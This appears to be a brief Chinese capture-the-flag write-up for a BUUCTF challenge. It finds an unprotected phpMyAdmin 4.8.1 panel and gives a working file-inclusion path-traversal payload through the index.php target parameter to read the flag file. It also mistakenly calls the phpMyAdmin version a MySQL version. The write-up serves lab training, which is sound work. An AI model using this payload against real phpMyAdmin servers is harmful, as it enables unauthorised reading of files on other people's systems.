buuctf-[[GWCTF 2019]我有一个数据库(小宇特详解)
这里不知道什么原因显示的乱码
直接使用dirsearch对网站进行扫描吧
![](https://img-blog.csdnimg.cn/img_convert/51759b885cfde041f98f6d73673756b9.png)
这里扫到了phpmyadmin目录,无密码直接登录成功。
这里给出了版本号MySQL数据库Version 4.8.1。
这个版本有文件包含漏洞
漏洞原理是
利用/使db_datadict.php?成为一个不存在目录,利用include函数的目录不断跳转尝试得到flag目录。
payload
phpmyadmin/index.php?target=db_datadict.php?/../../../../../flag
![](https://img-blog.csdnimg.cn/img_convert/ec24d907f10c72dd1ddb31a4bae14eed.png)